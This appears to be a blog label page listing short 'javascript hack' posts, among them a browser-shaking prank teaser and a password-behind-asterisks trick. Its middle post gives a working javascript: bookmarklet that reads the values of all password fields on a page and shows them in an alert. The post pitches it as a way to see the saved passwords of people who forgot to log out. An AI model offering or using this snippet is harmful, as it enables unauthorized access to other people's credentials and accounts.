Showing posts with label javascript hack. Show all posts
Showing posts with label javascript hack. Show all posts

Get password behind asterisks

Leave a Comment

           This is trick will let you see password behind asterisks. You might be thinking what is asterisks. It is dots or stars you see when you type password. This trick will let you see password behind asterisks. often people save their password on browser so this trick will let you get their password easily.
Read More

Hack Password Using Java Script

hi frndz.. many users forget to logout and they also tick ramember me option so thats way when login page open than password written in ****** so we not read it so now do this open login page and put this code after url of that page and hit enter u can see that passeord
javascript:(function() {var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j) %20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i) %20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22) %20s%20+=%20f[i].value%20+%20%22 %22;%20}%20}%20if %20(s)%20alert(%22This Trick is Exclusively shared by Supravat%20@www.superhacktricks.blogspot.com:%20The%20Password%20On %20This Page:%22%20+%20s);%20else%20alert(%22There%20are %20no%20passwords%20in%20forms%20on%20this %20page.%22);})();

Read More

Shake your browser: javascript trick

**Shaking Browser Trick**

This one is one of the funniest computer tricks I have learnt so far. Follow the steps below to learn this trick:

Copy the Java code below,
Read More